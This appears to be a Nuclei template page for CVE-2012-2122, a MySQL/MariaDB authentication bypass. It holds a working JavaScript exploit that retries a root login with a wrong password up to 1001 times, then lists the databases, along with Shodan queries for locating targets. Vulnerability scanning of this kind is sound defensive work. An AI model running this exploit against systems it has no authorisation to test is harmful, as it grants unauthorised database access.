Skip to content
Nuclei Templates

MySQL - Authentication Bypass

ID: CVE-2012-2122

Severity: medium

Author: pussycat0x

Tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle

Description

Section titled “Description”

sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.

YAML Source

Section titled “YAML Source”
id: CVE-2012-2122


info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
    - http://kb.askmonty.org/en/mariadb-5162-release-notes/
    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
    - http://security.gentoo.org/glsa/glsa-201308-06.xml
    - http://securitytracker.com/id?1027143
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
    cvss-score: 5.1
    cve-id: CVE-2012-2122
    cwe-id: CWE-287
    epss-score: 0.9681
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: mysql
    shodan-query:
      - "product:\"MySQL\""
      - product:"mysql"
  tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle


javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const mysql = require('nuclei/mysql');
      const client = new mysql.MySQLClient;
      for (let i = 1; i <= 1001; i++) {
      try {
      const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
      Export(connected);
      break;
      } catch {
        // error
      }
      }


    args:
      Host: "{{Host}}"
      Port: 3306
      User: "root"
      Pass: "wrong"
      Query: "show databases;"


    matchers:
      - type: dsl
        dsl:
          - "success == true"


    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 490a00463044022002610f47c6a75bd7e978425f0a1f570fd29702b7a499577eb9c22c5167d461b102205109b74e774d69d3c33463a4e0bfbeb80b24f1923dc16d38431adb0d55941752:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "javascript/cves/2012/CVE-2012-2122.yaml"

View on Github